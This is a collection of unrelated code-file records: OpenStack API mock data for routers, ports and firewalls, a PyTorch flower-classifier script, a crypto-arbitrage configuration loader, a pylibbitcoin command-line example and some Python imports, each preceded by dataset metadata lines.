"display_name": "snap-001",
"display_description": "Daily backup",
"volume_id": "521752a6-acf6-4b2d-bc7a-119f9148cd8c",
"status": "available",
"size": 10,
"created_at": "2012-02-29T03:50:07Z"
},
{
"id": SNAPSHOTS_IDS[1],
"display_name": "snap-002",
"display_description": "Weekly backup",
"volume_id": "76b8950a-8594-4e5b-8dce-0dfa9c696358",
"status": "available",
"size": 25,
"created_at": "2012-03-19T01:52:47Z"
}
]
}
VOLUME_BACKUPS_LIST = {
u'backups': [
{u'availability_zone': u'nova',
u'container': u'volumebackups',
u'created_at': u'2015-09-22T14:59:03.000000',
u'description': u'A Volume Backup',
u'fail_reason': None,
u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a',
u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT,
u'rel': u'self'}],
u'name': u'volumebackup-01',
u'object_count': 22,
u'size': 10,
u'status': u'available',
u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'}
]
}
ROUTERS_LIST = {
"routers": [{
"status": "ACTIVE",
"external_gateway_info":
{"network_id": "3c5bcddd-6af9-4e6b-9c3e-c153e521cab8"},
"name": "second_routers",
"admin_state_up": True,
"tenant_id": PROJECT_ID,
"id": ROUTERS_IDS[0]
}, {
"status": "ACTIVE",
"external_gateway_info":
{"network_id": "3c5bcddd-6af9-4e6b-9c3e-c153e521cab8"},
"name": "router1",
"admin_state_up": True,
"tenant_id": PROJECT_ID,
"id": ROUTERS_IDS[1]
}, {
"status": "ACTIVE",
"external_gateway_info":
{"network_id": "3c5bcddd-6af9-4e6b-9c3e-c153e521cab8"},
"name": "another_router",
"admin_state_up": True,
"tenant_id": "6b96ff0cb17a4b859e1e575d221683d3",
"id": "7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b"
}]
}
ROUTER_CLEAR_GATEWAY = {
"router": {
"status": "ACTIVE",
"external_gateway_info": None,
"name": "second_routers",
"admin_state_up": True,
"tenant_id": PROJECT_ID,
"id": ROUTERS_IDS[0]
}
}
ROUTER0_PORTS = {
"ports": [
{
"status": "ACTIVE",
"name": "",
"admin_state_up": True,
"network_id": "ebda9658-093b-41ba-80ce-0cf8cb8365d4",
"tenant_id": PROJECT_ID,
"binding:vif_type": "ovs",
"device_owner": "network:router_gateway",
"binding:capabilities": {
"port_filter": False
},
"mac_address": "fa:16:3e:b9:ef:05",
"fixed_ips": [
{
"subnet_id": "aca4d43c-c48c-4a2c-9bb6-ba374ef7e135",
"ip_address": "172.24.4.227"
}
],
"id": "664ebd1a-facd-4c20-948c-07a784475ab0",
"device_id": ROUTERS_IDS[0]
}
]
}
ROUTER1_PORTS = {
"ports": [
{
"status": "DOWN",
"name": "",
"admin_state_up": True,
"network_id": "ebda9658-093b-41ba-80ce-0cf8cb8365d4",
"tenant_id": PROJECT_ID,
"binding:vif_type": "ovs",
"device_owner": "network:router_gateway",
"binding:capabilities": {
"port_filter": False
},
"mac_address": "fa:16:3e:4a:3a:a2",
"fixed_ips": [
{
"subnet_id": "aca4d43c-c48c-4a2c-9bb6-ba374ef7e135",
"ip_address": "172.24.4.226"
}
],
"id": "c5ca7017-c390-4ccc-8cd7-333747e57fef",
"device_id": ROUTERS_IDS[1]
},
{
"status": "ACTIVE",
"name": "",
"admin_state_up": True,
"network_id": "9d83c053-b0a4-4682-ae80-c00df269ce0a",
"tenant_id": PROJECT_ID,
"binding:vif_type": "ovs",
"device_owner": "network:router_interface",
"binding:capabilities": {
"port_filter": False
},
"mac_address": "fa:16:3e:2d:dc:7e",
"fixed_ips": [
{
"subnet_id": "a318fcb4-9ff0-4485-b78c-9e6738c21b26",
"ip_address": "10.0.0.1"
}
],
"id": PORTS_IDS[0],
"device_id": ROUTERS_IDS[1]
}
]
}
NEUTRON_PORTS = {
'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] + [
{
"admin_state_up": True,
"allowed_address_pairs": [],
"binding:capabilities": {
"port_filter": False
},
"binding:host_id": "",
"binding:vif_type": "unbound",
"device_id": "",
"device_owner": "compute:azerty",
"extra_dhcp_opts": [],
"fixed_ips": [
{
"ip_address": "10.0.0.4",
"subnet_id": "51351eb9-7ce5-42cf-89cd-cea0b0fc510f"
}
],
"id": UNBOUND_PORT_ID,
"mac_address": "fa:16:3e:f5:62:22",
"name": "custom unbound port",
"network_id": "bf8d2e1f-221e-4908-a4ed-b6c0fd06e518",
"security_groups": [
"766110ac-0fde-4c31-aed7-72a97e78310b"
],
"status": "DOWN",
"tenant_id": PROJECT_ID
},
{
"admin_state_up": True,
"allowed_address_pairs": [],
"binding:capabilities": {
"port_filter": False
},
"binding:host_id": "",
"binding:vif_type": "unbound",
"device_id": "",
"device_owner": "",
"extra_dhcp_opts": [],
"fixed_ips": [
{
"ip_address": "10.0.0.4",
"subnet_id": "51351eb9-7ce5-42cf-89cd-cea0b0fc510f"
}
],
"id": "61c1b45e-45fe-4e04-8704-bf6f5876607d",
"mac_address": "fa:16:3e:f5:62:22",
"name": "custom unbound port",
"network_id": "bf8d2e1f-221e-4908-a4ed-b6c0fd06e518",
"security_groups": [
"766110ac-0fde-4c31-aed7-72a97e78310b"
],
"status": "DOWN",
"tenant_id": "ANOTHER_PROJECT"
}
]}
REMOVE_ROUTER_INTERFACE = {
"id": "8604a0de-7f6b-409a-a47c-a1cc7bc77b2e",
"tenant_id": "2f245a7b-796b-4f26-9cf9-9e82d248fda7",
"port_id": "3a44f4e5-1694-493a-a1fb-393881c673a4",
"subnet_id": "a2f1f29d-571b-4533-907f-5803ab96ead1"
}
NETWORKS_LIST = {
"networks": [
{
"status": "ACTIVE",
"subnets": ["a318fcb4-9ff0-4485-b78c-9e6738c21b26"],
"name": "private",
"admin_state_up": True,
"tenant_id": PROJECT_ID,
"id": NETWORKS_IDS[0],
"shared": False
},
{
"status": "ACTIVE",
"subnets": ["aca4d43c-c48c-4a2c-9bb6-ba374ef7e135"],
"name": "nova",
"admin_state_up": True,
"tenant_id": PROJECT_ID,
"id": NETWORKS_IDS[1],
"shared": False
},
{
"status": "ACTIVE",
"subnets": ["e12f0c45-46e3-446a-b207-9474b27687a6"],
"name": "network_3",
"admin_state_up": True,
"tenant_id": "ed680f49ff714162ab3612d7876ffce5",
"id": "afc75773-640e-403c-9fff-62ba98db1f19",
"shared": True
}
]
}
SECGROUPS_LIST = {
"security_groups": [
{
"description": "Custom Security Group",
"id": "85cc3048-abc3-43cc-89b3-377341426ac5",
"name": "custom",
"security_group_rules": [
{
"direction": "egress",
"ethertype": "IPv6",
"id": "3c0e45ff-adaf-4124-b083-bf390e5482ff",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": None,
"remote_ip_prefix": None,
"security_group_id": "85cc3048-abc3-43cc-89b3-377341426ac5",
"tenant_id": PROJECT_ID
},
{
"direction": "egress",
"ethertype": "IPv4",
"id": "93aa42e5-80db-4581-9391-3a608bd0e448",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": None,
"remote_ip_prefix": None,
"security_group_id": "85cc3048-abc3-43cc-89b3-377341426ac5",
"tenant_id": PROJECT_ID
},
{
"direction": "ingress",
"ethertype": "IPv6",
"id": "c0b09f00-1d49-4e64-a0a7-8a186d928138",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": "85cc3048-abc3-43cc-89b3-377341426ac5",
"remote_ip_prefix": None,
"security_group_id": "85cc3048-abc3-43cc-89b3-377341426ac5",
"tenant_id": PROJECT_ID
},
{
"direction": "ingress",
"ethertype": "IPv4",
"id": "f7d45c89-008e-4bab-88ad-d6811724c51c",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": "85cc3048-abc3-43cc-89b3-377341426ac5",
"remote_ip_prefix": None,
"security_group_id": "85cc3048-abc3-43cc-89b3-377341426ac5",
"tenant_id": PROJECT_ID
}
],
"tenant_id": PROJECT_ID
},
{
"description": "default",
"id": "12345678-1234-1234-1234-123456789012",
"name": "default",
"security_group_rules": [
{
"direction": "egress",
"ethertype": "IPv6",
"id": "3c0e45ff-adaf-4124-b083-bf390e5482ff",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": None,
"remote_ip_prefix": None,
"security_group_id": "12345678-1234-1234-1234-123456789012",
"tenant_id": PROJECT_ID
},
{
"direction": "egress",
"ethertype": "IPv4",
"id": "93aa42e5-80db-4581-9391-3a608bd0e448",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": None,
"remote_ip_prefix": None,
"security_group_id": "12345678-1234-1234-1234-123456789012",
"tenant_id": PROJECT_ID
},
{
"direction": "ingress",
"ethertype": "IPv6",
"id": "c0b09f00-1d49-4e64-a0a7-8a186d928138",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": "85cc3048-abc3-43cc-89b3-377341426ac5",
"remote_ip_prefix": None,
"security_group_id": "12345678-1234-1234-1234-123456789012",
"tenant_id": PROJECT_ID
},
{
"direction": "ingress",
"ethertype": "IPv4",
"id": "f7d45c89-008e-4bab-88ad-d6811724c51c",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": "85cc3048-abc3-43cc-89b3-377341426ac5",
"remote_ip_prefix": None,
"security_group_id": "12345678-1234-1234-1234-123456789012",
"tenant_id": PROJECT_ID
}
],
"tenant_id": PROJECT_ID
}
]
}
FLOATING_IPS_LIST = {
"floatingips":
[
{
"router_id": "d23abc8d-2991-4a55-ba98-2aaea84cc72f",
"tenant_id": PROJECT_ID,
"floating_network_id": "376da547-b977-4cfe-9cba-275c80debf57",
"fixed_ip_address": "10.0.0.3",
"floating_ip_address": "172.24.4.228",
"port_id": "ce705c24-c1ef-408a-bda3-7bbd946164ab",
"id": FLOATING_IPS_IDS[0]
},
{
"router_id": None,
"tenant_id": PROJECT_ID,
"floating_network_id": "376da547-b977-4cfe-9cba-275c80debf57",
"fixed_ip_address": None,
"floating_ip_address": "172.24.4.227",
"port_id": None,
"id": FLOATING_IPS_IDS[1]
}
]
}
LBAAS_HEALTHMONITOR_LIST = {
"health_monitors":
[
{
"admin_state_up": True,
"tenant_id": PROJECT_ID,
"delay": 5,
"expected_codes": "200",
"max_retries": 5,
"http_method": "GET",
"timeout": 2,
"pools": [],
"url_path": "/",
"type": "HTTP",
"id": LBAAS_HEALTHMONITOR_IDS[0]
}
]
}
LBAAS_VIP_LIST = {
"vips":
[
{
"status": "ACTIVE",
"protocol": "HTTP",
"description": "",
"address": "10.0.0.125",
"protocol_port": 80,
"port_id": PRIVATE_PORT_IDS[0],
"id": LBAAS_VIP_IDS[0],
"status_description": "",
"name": "test-http-vip",
"admin_state_up": True,
"tenant_id": PROJECT_ID,
"subnet_id": "b892434a-59f7-4404-a05d-9562977e1678",
"connection_limit": -1,
"pool_id": LBAAS_POOL_IDS[0],
"session_persistence": None
},
{
"status": "ACTIVE",
"protocol": "HTTP",
"description": "",
"address": "10.0.0.126",
"protocol_port": 80,
"port_id": PRIVATE_PORT_IDS[1],
"id": LBAAS_VIP_IDS[1],
"status_description": "",
"name": "test-http-vip",
"admin_state_up": True,
"tenant_id": PROJECT_ID,
"subnet_id": "b892434a-49f7-4404-a05d-9562977e1678",
"connection_limit": -1,
"pool_id": LBAAS_POOL_IDS[1],
"session_persistence": None
}
]
}
LBAAS_POOL_LIST = {
"pools":
[
{
"status": "ACTIVE",
"lb_method": "ROUND_ROBIN",
"protocol": "HTTP",
"description": "",
"health_monitors": [],
"subnet_id": "b892434a-59f7-4404-a05d-9562977e1678",
"tenant_id": PROJECT_ID,
"admin_state_up": True,
"name": "Test-Pools",
"health_monitors_status": [],
"members": [],
"provider": "haproxy",
"status_description": None,
"id": LBAAS_POOL_IDS[0]
},
{
"status": "ACTIVE",
"lb_method": "ROUND_ROBIN",
"protocol": "HTTP",
"description": "",
"health_monitors": [],
"subnet_id": "b892434a-49f7-4404-a05d-9562977e1678",
"tenant_id": PROJECT_ID,
"admin_state_up": True,
"name": "Test-Pools",
"health_monitors_status": [],
"members": [],
"provider": "haproxy",
"status_description": None,
"id": LBAAS_POOL_IDS[1]
}
]
}
LBAAS_MEMBER_LIST = {
"members":
[
{
"id": LBAAS_MEMBER_IDS[0],
"address": "10.0.0.122",
"protocol_port": 80,
"tenant_id": PROJECT_ID,
"admin_state_up": True,
"weight": 1,
"status": "ACTIVE",
"status_description": "member test1",
"pool_id": LBAAS_POOL_IDS[0]
},
{
"id": LBAAS_MEMBER_IDS[1],
"address": "10.0.0.123",
"protocol_port": 80,
"tenant_id": PROJECT_ID,
"admin_state_up": True,
"weight": 1,
"status": "ACTIVE",
"status_description": "member test1",
"pool_id": LBAAS_POOL_IDS[1]
}
]
}
FIREWALL_LIST = {
"firewalls":
[
{
"status": "ACTIVE",
"name": "fwass-test-1",
"admin_state_up": True,
"tenant_id": PROJECT_ID,
"firewall_policy_id": FIREWALL_POLICY_IDS[0],
"id": FIREWALL_IDS[0],
"description": ""
},
{
"status": "ACTIVE",
"name": "fwass-test-2",
"admin_state_up": True,
"tenant_id": PROJECT_ID,
"firewall_policy_id": FIREWALL_POLICY_IDS[1],
"id": FIREWALL_IDS[1],
"description": ""
}
]
}
METERING_LABEL_LIST = {
"metering_labels":
[
{
"tenant_id": PROJECT_ID,
"description": "Meter label test1",
"name": "Meterlabel1",
"id": METERING_LABEL_IDS[0]
},
{
"tenant_id": PROJECT_ID,
"description": "Meter label test2",
"name": "Meterlabel2",
"id": METERING_LABEL_IDS[1]
}
]
}
FIREWALL_POLICY_LIST = {
"firewall_policies":
[
{
"name": "TestFireWallPolicy1",
"firewall_rules": [FIREWALL_RULE_IDS[0]],
"tenant_id": PROJECT_ID,
"audited": False,
"shared": False,
"id": FIREWALL_POLICY_IDS[0],
"description": "Testing firewall policy 1"
},
{
"name": "TestFireWallPolicy2",
"firewall_rules": [FIREWALL_RULE_IDS[1]],
"tenant_id": PROJECT_ID,
"audited": False,
"shared": False,
"id": FIREWALL_POLICY_IDS[1],
"description": "Testing firewall policy 2"
}
]
}
FIREWALL_RULE_LIST = {
"firewall_rules":
[
{
"protocol": "tcp",
"description": "Firewall rule 1",
"source_port": None,
"source_ip_address": None,
"destination_ip_address": None,
"firewall_policy_id": None,
"position": None,
"destination_port": "80",
"id": FIREWALL_RULE_IDS[0],
"name": "",
"tenant_id": PROJECT_ID,
"enabled": True,
"action": "allow",
"ip_version": 4,
"shared": False
},
{
"protocol": "tcp",
"description": "Firewall rule 1",
"source_port": None,
"source_ip_address": None,
"destination_ip_address": None,
"firewall_policy_id": None,
"position": None,
"destination_port": "80",
"id": FIREWALL_RULE_IDS[1],
"name": "",
"tenant_id": PROJECT_ID,
"enabled": True,
"action": "allow",
"ip_version": 4,
"shared": False
}
]
}
SERVERS_LIST = {
"servers": [
{
"accessIPv4": "",
"accessIPv6": "",
"addresses": {
"private": [
{
"addr": "192.168.0.3",
"version": 4
}
]
},
"created": "2012-09-07T16:56:37Z",
"flavor": {
"id": "1",
"links": [
{
"href": "http://openstack.example.com/openstack/flavors/1",
"rel": "bookmark"
}
]
},
"hostId": "16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e",
"id": SERVERS_IDS[0],
"image": {
"id": "70a599e0-31e7-49b7-b260-868f441e862b",
"links": [
{
"href": "http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b",
"rel": "bookmark"
}
]
},
"links": [
{
"href": "http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931",
"rel": "self"
},
{
"href": "http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931",
"rel": "bookmark"
}
],
"metadata": {
"My Server Name": "Apache1"
},
"name": "new-server-test",
"progress": 0,
"status": "ACTIVE",
"tenant_id": "openstack",
"updated": "2012-09-07T16:56:37Z",
"user_id": "fake"
}
]
}
IMAGES_LIST = {
"images": [
{
"checksum": "f8a2eeee2dc65b3d9b6e63678955bd83",
"container_format": "ami",
"created_at": "2014-02-03T14:13:53",
"deleted": False,
"deleted_at": None,
"disk_format": "ami",
"id": "37717f53-3707-49b9-9dd0-fd063e6b9fc5",
"is_public": True,
"min_disk": 0,
"min_ram": 0,
"name": "cirros-0.3.1-x86_64-uec",
"owner": PROJECT_ID,
"properties": {
"kernel_id": "4e150966-cbe7-4fd7-a964-41e008d20f10",
"ramdisk_id": "482fbcc3-d831-411d-a073-ddc828a7a9ed"
},
"protected": False,
"size": 25165824,
"status": "active",
"updated_at": "2014-02-03T14:13:54"
},
{
"checksum": "c352f4e7121c6eae958bc1570324f17e",
"container_format": "aki",
"created_at": "2014-02-03T14:13:52",
"deleted": False,
"deleted_at": None,
"disk_format": "aki",
"id": "4e150966-cbe7-4fd7-a964-41e008d20f10",
"is_public": True,
"min_disk": 0,
"min_ram": 0,
"name": "cirros-0.3.1-x86_64-uec-kernel",
"owner": PROJECT_ID,
"properties": {},
"protected": False,
"size": 4955792,
"status": "active",
"updated_at": "2014-02-03T14:13:52"
},
{
"checksum": "69c33642f44ca552ba4bb8b66ad97e85",
"container_format": "ari",
"created_at": "2014-02-03T14:13:53",
"deleted": False,
"deleted_at": None,
"disk_format": "ari",
"id": "482fbcc3-d831-411d-a073-ddc828a7a9ed",
"is_public": True,
"min_disk": 0,
"min_ram": 0,
"name": "cirros-0.3.1-x86_64-uec-ramdisk",
"owner": PROJECT_ID,
"properties": {},
"protected": False,
"size": 3714968,
"status": "active",
"updated_at": "2014-02-03T14:13:53"
}
]
}
ALARMS_LIST = [
{
"alarm_actions": [
"http://site:8000/alarm"
],
"alarm_id": ALARMS_IDS[0],
"combination_rule": None,
"description": "An alarm",
"enabled": True,
"insufficient_data_actions": [
"http://site:8000/nodata"
],
"name": "SwiftObjectAlarm",
"ok_actions": [
"http://site:8000/ok"
],
"project_id": "c96c887c216949acbdfbd8b494863567",
"repeat_actions": False,
"state": "ok",
"state_timestamp": "2013-11-21T12:33:08.486228",
"threshold_rule": None,
"timestamp": "2013-11-21T12:33:08.486221",
"type": "threshold",
"user_id": "c96c887c216949acbdfbd8b494863567"
}
]
STACKS_LIST = {
"stacks": [
{
"description": "First test",
"links": [
{
"href": "http://site/5c136348-5550-4ec5-8bd6-b83241844db3",
"rel": "self"
}
],
"stack_status_reason": "",
"stack_name": "stack1",
"creation_time": "2015-03-03T14:08:54Z",
"updated_time": None,
"stack_status": "CREATE_SUCCESS",
"id": "5c136348-5550-4ec5-8bd6-b83241844db3"
},
{
"description": "Second test",
"links": [
{
"href": "http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9",
"rel": "self"
}
],
"stack_status_reason": "",
"stack_name": "stack2",
"creation_time": "2015-03-03T17:34:21Z",
"updated_time": None,
"stack_status": "DELETE_FAILED",
"id": "ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9"
}
]
}
| 1.210938 | 1 |
model.py | av192/Flower-Classifier | 0 | 12794298 | import yaml
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import os
import torch
import torchvision
import matplotlib.pyplot as plt
import seaborn as sns
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader
import torchvision.transforms as transforms
from torchvision import datasets,models
import math
import torch.optim as optim
from torch.optim import lr_scheduler
import copy
import time
from PIL import Image
from datetime import datetime
from utils import *
data_dir = '.'
test_path = os.path.join(data_dir, 'test')
sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv'))
sample_sub['path'] = sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x))
# Get configs from config file
stream = open("config.yaml", 'r')
config_dict = yaml.safe_load(stream)
batch_size = config_dict['batch_size']
learning_rate = config_dict['lr']
model_pth = config_dict['model_pth']
train_data = config_dict['train_data']
valid_data = config_dict['valid_data']
test_data = config_dict['test_data']
# Apply transforms
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
data_transforms = {
'train': transforms.Compose([
transforms.Resize((230, 230)),
transforms.RandomRotation(30,),
transforms.RandomCrop(224),
transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
transforms.ToTensor(),
normalize
]),
'valid': transforms.Compose([
transforms.Resize((400, 400)),
transforms.CenterCrop((224, 224)),
transforms.ToTensor(),
normalize
]),
'test': transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor(),
normalize
]),
}
# Load dataloaders
image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x),
data_transforms[x])
for x in ['train', 'valid']}
dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True, num_workers=0)
for x in ['train', 'valid']}
dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'valid']}
class_names = image_datasets['train'].classes
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# Trains Model
def train_model2(model, criterion, optimizer,
num_epochs=3, dataloaders= dataloaders, print_progress=False):
"""
:param model: Model type object
:param criterion: Loss function
:param optimizer: Optimizer
:param num_epochs: Number of epochs
:param dataloaders: Dataloaders, must be a dictionary having train and val as keys
:param print_progress: prints progress if true
:return: trained model object
"""
min_val_loss = np.Inf
best_model_wts = copy.deepcopy(model.state_dict())
since = time.time()
best_epoch = -1
for epoch in range(num_epochs):
valid_loss = 0.0
train_loss = 0.0
model.train()
running_corrects = 0
for iter1, (inputs, labels) in enumerate(dataloaders['train']):
inputs = inputs.to(device)
inputs = inputs.type(torch.float)
labels = labels.to(device)
labels = labels.type(torch.long)
optimizer.zero_grad()
out = model(inputs)
_, preds = torch.max(out, 1)
# out = torch.mul(out,100)
loss = criterion(out, labels)
loss.backward()
optimizer.step()
train_loss += loss.item() * inputs.size(0)
# running_corrects += torch.sum(preds == labels.data)
if print_progress:
print(
f"Epoch: {epoch}\t{100 * (iter1 + 1) / len(dataloaders['train']):.2f}" + '%',
end='\r')
else:
print()
with torch.no_grad():
model.eval()
for iter2, (inputs, labels) in enumerate(dataloaders['valid']):
inputs = inputs.to(device)
inputs = inputs.type(torch.float)
labels = labels.to(device)
labels = labels.type(torch.long)
output1 = model(inputs)
_, preds1 = torch.max(output1, 1)
# output1 = torch.mul(output1,100).to(device)
loss = criterion(output1, labels)
valid_loss += loss.item() * inputs.size(0)
running_corrects += torch.sum(preds1 == labels.data)
print(
f'Epoch: {epoch}\t{100 * (iter2 + 1) / len(dataloaders["valid"]):.2f} %',
end='\r')
len_train1 = 6552
len_val1 = len(dataloaders['valid'].dataset)
train_loss = train_loss / len_train1
valid_loss = valid_loss / len_val1
if print_progress:
print(
f'\nEpoch: {epoch + 1} \tTraining Loss: {math.sqrt(train_loss):.4f} \tValidation Loss: {math.sqrt(valid_loss):.4f}')
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
print(f'Accuracy : {100 * running_corrects / len_val1} %')
if valid_loss < min_val_loss:
min_val_loss = valid_loss
best_epoch = epoch
best_model_wts = copy.deepcopy(model.state_dict())
print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss)))
print(f'Epoch completed: {epoch+1}')
print(f'Best Epoch: {best_epoch+1}')
model.load_state_dict(best_model_wts)
return model
def process_image(img_path):
"""
:param img_path: Path of image to be processed
:returns processed numpy array
Scales, crops, and normalizes a PIL image for a PyTorch model,
returns a Numpy array
"""
img = Image.open(img_path)
# Resize
if img.size[0] > img.size[1]:
img.thumbnail((10000, 256))
else:
img.thumbnail((256, 10000))
# Crop Image
left_margin = (img.width - 224) / 2
bottom_margin = (img.height - 224) / 2
right_margin = left_margin + 224
top_margin = bottom_margin + 224
img = img.crop((left_margin, bottom_margin, right_margin,
top_margin))
# Normalize
img = np.array(img) / 255
mean = np.array([0.485, 0.456, 0.406]) # provided mean
std = np.array([0.229, 0.224, 0.225]) # provided std
img = (img - mean) / std
return img
# Load test dataset from class defined in utils
test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test'])
test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False)
# Load Class to idx dictionary
class_to_idx = image_datasets['valid'].class_to_idx
idx_to_class = {val: key for key, val in class_to_idx.items()}
def predict(model_path, dataloader, print_progress=False):
"""
:param model_path: Path of Model used for prediction
:param dataloader: Test DataLoader
:param print_progress: Prints progress if True
:return: Prediction(as a list) on test folder defined by config file
"""
model = torch.load(model_path)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model.to(device)
model.eval()
predictions = {}
with torch.no_grad():
for ii, (images, _, img_names) in enumerate(dataloader, start=1):
if print_progress:
if ii % 5 == 0:
print('Batch {}/{}'.format(ii, len(dataloader)))
images = images.to(device)
logps = model(images)
ps = torch.exp(logps)
# Top indices
_, top_indices = ps.topk(1)
top_indices = top_indices.detach().cpu().numpy().tolist()
# Convert indices to classes
top_classes = [idx_to_class[idx[0]] for idx in top_indices]
# print("Img:" ,img_names)
for i, img_name in enumerate(img_names):
predictions[img_name] = top_classes[i]
print('\nPrediction Generation Completed')
return predictions
| 2.421875 | 2 |
Arbitrage_Spot/dquant/config.py | ronaldzgithub/CryptoArbitrage | 1 | 12794299 | <filename>Arbitrage_Spot/dquant/config.py
import collections
import logging
from configparser import ConfigParser
from pprint import pprint
import os
from dquant.constants import Constants
from dquant.util import Util
# logging.basicConfig(level=logging.INFO)
# print(__name__)
logger = logging.getLogger(__name__)
section_names = 'fortest', 'datadog', 'influxdb', 'okex', 'okex_future', 'bitmex', 'bitfinex', 'binance', 'mongo', 'huobi', 'redis', 'monitor', 'customized_precisions'
class MyConfiguration():
__config_dict = collections.defaultdict(dict)
def __init__(self, *file_names):
parser = ConfigParser()
parser.optionxform = str # make option names case sensitive
for file_name in file_names:
found = parser.read(file_name)
raw_file_name = result = file_name.split('/')[-1]
group = Util.slice_till_dot(raw_file_name)
if not found:
raise ValueError('No config file found!')
for name in section_names:
self.__config_dict[group].update(parser.items(name))
def pretty_print(self):
pprint(self.__config_dict)
def get_config_base(self, state, key):
try:
result = self.__config_dict[state][key]
logger.info("key={}, result={}".format(key, result))
return result
except KeyError:
logger.error(KeyError)
def get_config(self, key):
return self.get_config_base(os.environ.get(Constants.DQUANT_ENV), key)
def get_int_config(self, key):
return int(self.get_config(key))
def get_float_config(self, key):
return float(self.get_config(key))
def get_bool_config(self, key):
return self.get_config(key) == 'true' or self.get_config(key) == 'True'
def get_precisions(self, name, symbol):
# bitfinex_ethusdt_amount
metas = ['min_amount', 'price', 'amount']
return_list = []
for meta in metas:
cfg_name = "{}_{}_{}".format(name.lower(), symbol.lower(), meta)
try:
ret = None
if meta == 'min_amount':
ret = self.get_float_config(cfg_name)
else:
ret = self.get_int_config(cfg_name)
except Exception:
logger.error("Cannot find %s precision: %s %s, using default" % (meta, name.lower(), symbol.lower()))
finally:
return_list.append(ret)
return return_list
cfg = MyConfiguration(os.path.join(os.path.dirname(__file__), '../config/dev.cfg'),
os.path.join(os.path.dirname(__file__), '../config/pro.cfg'))
| 2.15625 | 2 |
examples/cli.py | darosior/pylibbitcoin | 3 | 12794300 | import asyncio
import sys
import binascii
import bitcoin.core
import pylibbitcoin.client
def block_header(client):
index = sys.argv[2]
return client.block_header(int(index))
def last_height(client):
return client.last_height()
def block_height(client):
hash = sys.argv[2]
return client.block_height(hash)
def transaction(client):
hash = sys.argv[2]
return client.transaction(hash)
def transaction_index(client):
hash = sys.argv[2]
return client.transaction_index(hash)
def block_transaction_hashes(client):
height = int(sys.argv[2])
return client.block_transaction_hashes(height)
def spend(client):
hash = sys.argv[2]
index = int(sys.argv[3])
return client.spend(hash, index)
async def subscribe_address(client):
address = sys.argv[2]
return await client.subscribe_address(address)
async def _read_from(queue):
while True:
print(await queue.get())
def unsubscribe_address(client):
address = sys.argv[2]
return client.unsubscribe_address(address)
def broadcast(client):
# Grab a raw block from https://blockchain.info/block/000000000000000000a7b4999c723ed9f308425708577c76827ade51062e135a?format=hex # noqa: E501
# This might seem odd but this is a sanity check a client should probably do. # noqa: E501
block = bitcoin.core.CBlock.deserialize(binascii.unhexlify(sys.argv[2]))
return client.broadcast(binascii.hexlify(block.serialize()))
async def history3(client):
address = sys.argv[2]
start_height = 10_000
return await client.history3(address, start_height)
commands = {
"last_height": last_height,
"block_header": block_header,
"block_height": block_height,
"transaction": transaction,
"transaction_index": transaction_index,
"spend": spend,
"subscribe_address": subscribe_address,
"unsubscribe_address": unsubscribe_address,
"broadcast": broadcast,
"history3": history3,
"block_transaction_hashes": block_transaction_hashes,
}
def main():
if len(sys.argv) < 2:
sys.exit("Usage: %s last_height|block_header|<cmd>" % sys.argv[0])
command = sys.argv[1]
if command not in commands:
sys.exit("Command can be %s" % str.join(", ", iter(commands)))
# client = pylibbitcoin.client.Client("tcp://127.0.0.1:9999", settings=pylibbitcoin.client.ClientSettings(timeout=5))
# client = pylibbitcoin.client.Client("tcp://mainnet.libbitcoin.net:9091")
client = pylibbitcoin.client.Client("mainnet.libbitcoin.net", {"query": 9091,
"heartbeat": 9092, "block": 9093, "tx": 9094})
loop = asyncio.get_event_loop()
error_code, result = loop.run_until_complete(commands[sys.argv[1]](client))
print("Error code: {}".format(error_code))
print("Result: {}".format(result))
if type(result) == asyncio.queues.Queue:
loop.run_until_complete(_read_from(result))
number_of_pending_responses = loop.run_until_complete(client.stop())
print("Number of pending responses lost: {}".format(number_of_pending_responses))
loop.close()
if __name__ == '__main__':
main()
| 2.34375 | 2 |
yle_reader_to_dataframe.py | kamalmemon/yle-news-reader | 0 | 12794301 | <reponame>kamalmemon/yle-news-reader<filename>yle_reader_to_dataframe.py
import zipfile
import argparse
import sys
import json
import re
import os
from markdown import markdown
from bs4 import BeautifulSoup
import ftfy
import pandas as pd
